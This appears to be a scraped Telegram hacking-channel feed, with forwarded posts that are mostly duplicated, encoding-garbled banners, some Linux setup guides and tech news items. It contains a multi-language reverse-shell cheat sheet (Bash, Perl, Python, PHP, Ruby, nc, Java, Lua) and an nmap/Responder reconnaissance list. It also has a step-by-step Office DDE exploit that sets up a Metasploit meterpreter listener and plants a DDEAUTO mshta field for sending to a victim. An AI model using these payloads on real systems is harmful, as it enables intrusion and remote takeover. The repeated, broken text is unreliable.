Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
Reverse shell method for multiple programming languages ββunder Linux l:
Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl version: perl -e'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p ,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i" );};
Python version: python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s. fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i "]);'
PHP version: php -r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby version: ruby ββ-rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)'
nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp /f
nc xxxx 8888|/bin/sh|nc xxxx 9999
java version: r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/ bin/sh -i <&3 >&3 2>&3');"
β β β Uππ»βΊπ«Δπ¬πβ β β β
Reverse shell method for multiple programming languages ββunder Linux l:
Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl version: perl -e'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p ,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i" );};
Python version: python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s. fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i "]);'
PHP version: php -r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby version: ruby ββ-rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)'
nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp /f
nc xxxx 8888|/bin/sh|nc xxxx 9999
java version: r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/ bin/sh -i <&3 >&3 2>&3');"
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
The AdDuplex study reveals that the Windows 10 20H2 edition utilization rate approaches 10%
#Analytiques
#Analytiques
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Launch a simple service via apache :
C.D.Luminate
https://github.com/cdluminate/withlinux
---START---
1. install apache2
sudo apt install apache2
then apache2 will autostart and set to start after boot.
sysv-rc-conf, or systemctl disable ... etc.
2. configure
cd /etc/apache2
consider to,
at port 8080, serve a file server rooted at /some/dir
-> default is /var/www for debian.
2.1 [optional] config apache2.conf
add this , or Include a file contained it, such as mysrvdir.conf
add ServerName such as
> ServerName localhost
2.2 config ports.conf
add
Listen 8080
or sth like
Listen [IPv6_addr]:8080
Listen 192.168.0.1:8080 -> to bind a ip addr
Listen *:8080 -> wildcard is supported
and comment other ports.
2.3 add a file to sites-enabled/
file contents
3. bind mount
mount --bind /dir/of/files/to/serve /some/dir
4. start apache
apachectl start
ref: apach.org
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Launch a simple service via apache :
C.D.Luminate
https://github.com/cdluminate/withlinux
---START---
1. install apache2
sudo apt install apache2
then apache2 will autostart and set to start after boot.
sysv-rc-conf, or systemctl disable ... etc.
2. configure
cd /etc/apache2
apache2.conf -> the main configure file.
`--ports.conf -> conf about ports.
consider to,
at port 8080, serve a file server rooted at /some/dir
-> default is /var/www for debian.
2.1 [optional] config apache2.conf
add this , or Include a file contained it, such as mysrvdir.conf
<Directory /some/dir>
Options None
AllowOverride None
Require all granted
</Directory>
add ServerName such as
> ServerName localhost
2.2 config ports.conf
add
Listen 8080
or sth like
Listen [IPv6_addr]:8080
Listen 192.168.0.1:8080 -> to bind a ip addr
Listen *:8080 -> wildcard is supported
and comment other ports.
2.3 add a file to sites-enabled/
file contents
<VirtualHost *:8080>
ServerAdmin root@localhost
DocumentRoot /some/dir
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
3. bind mount
mount --bind /dir/of/files/to/serve /some/dir
4. start apache
apachectl start
ref: apach.org
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MORE SECURITY AND ANONIMITY :
π‘ How to install dnscrypt proxy with ad blocker on Linux ??
COPY AND PASTE COMMANDS TO YOUR TERM:
Run the command according to your Linux distribution as root user:
A)
Debian / Ubuntu users use apt / apt-get ##
$ sudo apt install dnscrypt-proxy
## Alpine Linux users use apk ##
$ sudo apk add dnscrypt-proxy
## CentOS / RHEL users:
## Add EPEL repository on CentOS 8 or RHEL 8
## use yum ##
$ sudo yum install dnscrypt-proxy
## Arch Linux use pacman ##
$ sudo pacman -S dnscrypt-proxy
## OpenSUSE / SUSE Linux users use zypper ##
$ sudo zypper in dnscrypt-proxy
## Fedora users use dnf ##
$ sudo dnf install dnscrypt-proxY
B)
Dnscrypt proxy configuration
Edit dnscrypt-proxy.toml in the / etc / dnscrypt-proxy / directory.
For example:
$ ls -l /etc/dnscrypt-proxy/
$ sudo vim /etc/dnscrypt-proxy/dnscrypt-proxy.toml
First, we need to set up a list of used servers.
Let's use both Google and Cloudflare:
server_names = [ 'google' 'cloudflare']
I can use cloudflare too:
server_names = [ 'cloudflare']
Configure the list of listening local addresses and ports:
listen_addresses = ['127.0.0.1:53', '[::1]:53']
For my VPN 172.168.0.0/24:
listen_addresses = ['127.0.0.1:53', '172.168.0.1:53' ]
If you have an IPv6 connection, use the servers available over IPv6 (IPv4 by default):
ipv6_servers = true
Make sure we are using servers that implement DNSCrypt and DoH protocol.
dnscrypt_servers = true
doh_servers = true
Make sure we enable DNS cache to reduce latency and outbound traffic:
cache = true
The server must support DNS Security Extensions (DNSSEC):
require_dnssec = true
Adblock lists consist of one template per line.
Examples of valid patterns:
##
## example.com
## =example.com
## ads.*
## ads*.example.*
## ads*.example[0-9]*.com
Blocking rules file path:
blacklist_file = '/etc/dnscrypt-proxy/blacklist.txt'
Save and close the file.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MORE SECURITY AND ANONIMITY :
π‘ How to install dnscrypt proxy with ad blocker on Linux ??
COPY AND PASTE COMMANDS TO YOUR TERM:
Run the command according to your Linux distribution as root user:
A)
Debian / Ubuntu users use apt / apt-get ##
$ sudo apt install dnscrypt-proxy
## Alpine Linux users use apk ##
$ sudo apk add dnscrypt-proxy
## CentOS / RHEL users:
## Add EPEL repository on CentOS 8 or RHEL 8
## use yum ##
$ sudo yum install dnscrypt-proxy
## Arch Linux use pacman ##
$ sudo pacman -S dnscrypt-proxy
## OpenSUSE / SUSE Linux users use zypper ##
$ sudo zypper in dnscrypt-proxy
## Fedora users use dnf ##
$ sudo dnf install dnscrypt-proxY
B)
Dnscrypt proxy configuration
Edit dnscrypt-proxy.toml in the / etc / dnscrypt-proxy / directory.
For example:
$ ls -l /etc/dnscrypt-proxy/
$ sudo vim /etc/dnscrypt-proxy/dnscrypt-proxy.toml
First, we need to set up a list of used servers.
Let's use both Google and Cloudflare:
server_names = [ 'google' 'cloudflare']
I can use cloudflare too:
server_names = [ 'cloudflare']
Configure the list of listening local addresses and ports:
listen_addresses = ['127.0.0.1:53', '[::1]:53']
For my VPN 172.168.0.0/24:
listen_addresses = ['127.0.0.1:53', '172.168.0.1:53' ]
If you have an IPv6 connection, use the servers available over IPv6 (IPv4 by default):
ipv6_servers = true
Make sure we are using servers that implement DNSCrypt and DoH protocol.
dnscrypt_servers = true
doh_servers = true
Make sure we enable DNS cache to reduce latency and outbound traffic:
cache = true
The server must support DNS Security Extensions (DNSSEC):
require_dnssec = true
Adblock lists consist of one template per line.
Examples of valid patterns:
##
## example.com
## =example.com
## ads.*
## ads*.example.*
## ads*.example[0-9]*.com
Blocking rules file path:
blacklist_file = '/etc/dnscrypt-proxy/blacklist.txt'
Save and close the file.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Next year, TSMC and other vendors will support PS5 production or surpass 18 million next year.
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Recon nmap and windows Hacking commands :
#Commnands :
# Enumerate subnet
nmap -sn 10.10.10.1/24
# Fast simple scan
nmap -sS 10.10.10.1/24
export IP=10.10.10.11
# Extracting Live IPs from Nmap Scan
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips
# Full complete slow scan with output
nmap -v -sT -A -T4 -p- -Pn --script vuln -oA full $IP
# Autorecon
python3 autorecon.py $IP
# Scan for UDP
nmap $IP -sU
unicornscan -mU -v -I $IP
# Connect to udp if one is open
nc -u $IP 48772
# Responder
responder -I eth0 -A
# Amass
amass enum $IP
# Generating nice scan report
nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
#Simple Port Knocking
for x in 7000 8000 9000; do nmap -Pn βhost_timeout 201 βmax-retries 0 -p $x 1.1.1.1; done
File enumeration :
Common :
# Check real file type
file file.xxx
# Analyze strings
strings file.xxx
strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars
# Check embedded files
binwalk file.xxx # Check
binwalk -e file.xxx # Extract
# Check as binary file in hex
ghex file.xxx
# Check metadata
exiftool file.xxx
# Stego tool for multiple formats
wget https://embeddedsw.net/zip/OpenPuff_release.zip
unzip OpenPuff_release.zip -d ./OpenPuff
wine OpenPuff/OpenPuff_release/OpenPuff.exe
Disk files
# guestmount can mount any kind of disk file
sudo apt-get install libguestfs-tools
guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Recon nmap and windows Hacking commands :
#Commnands :
# Enumerate subnet
nmap -sn 10.10.10.1/24
# Fast simple scan
nmap -sS 10.10.10.1/24
export IP=10.10.10.11
# Extracting Live IPs from Nmap Scan
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips
# Full complete slow scan with output
nmap -v -sT -A -T4 -p- -Pn --script vuln -oA full $IP
# Autorecon
python3 autorecon.py $IP
# Scan for UDP
nmap $IP -sU
unicornscan -mU -v -I $IP
# Connect to udp if one is open
nc -u $IP 48772
# Responder
responder -I eth0 -A
# Amass
amass enum $IP
# Generating nice scan report
nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
#Simple Port Knocking
for x in 7000 8000 9000; do nmap -Pn βhost_timeout 201 βmax-retries 0 -p $x 1.1.1.1; done
File enumeration :
Common :
# Check real file type
file file.xxx
# Analyze strings
strings file.xxx
strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars
# Check embedded files
binwalk file.xxx # Check
binwalk -e file.xxx # Extract
# Check as binary file in hex
ghex file.xxx
# Check metadata
exiftool file.xxx
# Stego tool for multiple formats
wget https://embeddedsw.net/zip/OpenPuff_release.zip
unzip OpenPuff_release.zip -d ./OpenPuff
wine OpenPuff/OpenPuff_release/OpenPuff.exe
Disk files
# guestmount can mount any kind of disk file
sudo apt-get install libguestfs-tools
guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
The recent patent from Apple confirms that potential MacBooks can be fitted with view keyboards.
#Technologies
#Technologies
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Windows Penetration Testing Using Microsoft Office DDE Exploit (MACROLESS) :
1) DDE exploitation was also known as dynamic data exchange, it allows data to be transferred between applications without any user interaction.
Hackers have used this technique to execute malicious scripts to compromise data.
This was reported to Microsoft by Sensepost, Etienne Stalmans and Saif El-Sherei, but this has not been fixed as many applications use the DDE protocol.
This exploit does not require a macro feature to be enabled.
Prerequisites - DDE exploit
Windows machine
Microsoft Office (any version)
Kali Linux
We will have to import the Metasploit exploit.
Download it from GitHub using the terminal command:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move the script to the Metasploit location
mv dde_delivery.rb / usr / share / metasploit-framework / modules / exploits / windows /
2) Now enter msfconsole in the terminal that starts the Metasploit framework and enter reload_all to load modules.
3) use exploit/windows/dde_deliverythen set the sever host using the following command
set SRVHOST 192.168.177.141
we need to set up a payload listener.
Do not use port 8080 as the default server port is set to 8080
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.177.141
set LPORT 6708
exploit
4) Now copy and paste the code into any text document.
We used Office 365 Pro Plus, completely revamped.
Find the formula and you should have a small error window in your document, then right click on the toggle code.
Paste the command into the document in parentheses.
Save your document.
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe βhttp://192.168.177.141:8080/mVg3YDU3gVQβ}
5) Send the document to the suspect and a counter session will open.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Windows Penetration Testing Using Microsoft Office DDE Exploit (MACROLESS) :
1) DDE exploitation was also known as dynamic data exchange, it allows data to be transferred between applications without any user interaction.
Hackers have used this technique to execute malicious scripts to compromise data.
This was reported to Microsoft by Sensepost, Etienne Stalmans and Saif El-Sherei, but this has not been fixed as many applications use the DDE protocol.
This exploit does not require a macro feature to be enabled.
Prerequisites - DDE exploit
Windows machine
Microsoft Office (any version)
Kali Linux
We will have to import the Metasploit exploit.
Download it from GitHub using the terminal command:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move the script to the Metasploit location
mv dde_delivery.rb / usr / share / metasploit-framework / modules / exploits / windows /
2) Now enter msfconsole in the terminal that starts the Metasploit framework and enter reload_all to load modules.
3) use exploit/windows/dde_deliverythen set the sever host using the following command
set SRVHOST 192.168.177.141
we need to set up a payload listener.
Do not use port 8080 as the default server port is set to 8080
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.177.141
set LPORT 6708
exploit
4) Now copy and paste the code into any text document.
We used Office 365 Pro Plus, completely revamped.
Find the formula and you should have a small error window in your document, then right click on the toggle code.
Paste the command into the document in parentheses.
Save your document.
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe βhttp://192.168.177.141:8080/mVg3YDU3gVQβ}
5) Send the document to the suspect and a counter session will open.
(don't copy our tips)Β― \ _ (γ) _ / Β―
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
